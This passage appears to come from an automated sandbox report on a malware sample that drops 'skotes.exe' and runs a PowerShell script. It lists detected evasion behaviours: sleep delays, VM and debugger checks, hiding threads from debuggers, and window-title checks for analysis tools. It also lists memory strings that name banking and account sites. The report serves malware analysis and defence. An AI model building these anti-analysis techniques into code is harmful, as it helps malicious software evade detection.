Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7164 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep count: 380 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep time: -11400000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7152 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1020 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1020 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7120 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7120 Thread sleep time: -170085s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1488 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4144 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWfe
Source: Web Data.17.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: global block list test formVMware20,11696428655
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3298502123.0000029748A54000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2906000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3283028567.0000029D55F6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3282652339.000002B9C28BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291115405.000001F42CEF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000010.00000002.3308379802.000001A8B289F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3292128593.0000029D56416000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: Web Data.17.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: firefox.exe, 00000010.00000002.3304423656.000001A8A841A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3029532362.000001A8A8425000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.17.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 0000000C.00000002.3290216462.000002974342B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPn
Source: Web Data.17.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.17.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: firefox.exe, 0000001F.00000002.3283065677.000001F42CAEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0:
Source: Web Data.17.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2976001217.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmltN
Source: Web Data.17.dr Binary or memory string: discord.comVMware20,11696428655f
Source: firefox.exe, 00000016.00000002.3283028567.0000029D55F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: Web Data.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.17.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Web Data.17.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.17.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.17.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000010.00000002.3309155779.000001A8B2906000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.17.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.17.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.17.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: firefox.exe, 0000001A.00000002.3292242787.000002B9C3210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: powershell.exe, 00000007.00000002.3065418302.0000000007576000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Web Data.17.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Web Data.17.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.17.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2083028111.0000000000506000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2120676594.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2123277356.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 00000007.00000002.2976001217.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFT_NetEventVmNetworkAdatper.cdxmlDn
Source: Web Data.17.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: firefox.exe, 00000016.00000002.3293759205.0000029D56500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D20E78 rdtsc 0_2_04D20E78
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EF652B mov eax, dword ptr fs:[00000030h] 6_2_00EF652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EFA302 mov eax, dword ptr fs:[00000030h] 6_2_00EFA302
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account Jump to behavior
Source: file.exe, 00000000.00000002.2083028111.0000000000506000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2120676594.00000000010B6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2123277356.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: o8`[0Program Manager
Source: skotes.exe, skotes.exe, 00000006.00000002.3283455170.00000000010B6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 8`[0Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EDD3E2 cpuid 6_2_00EDD3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1 VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
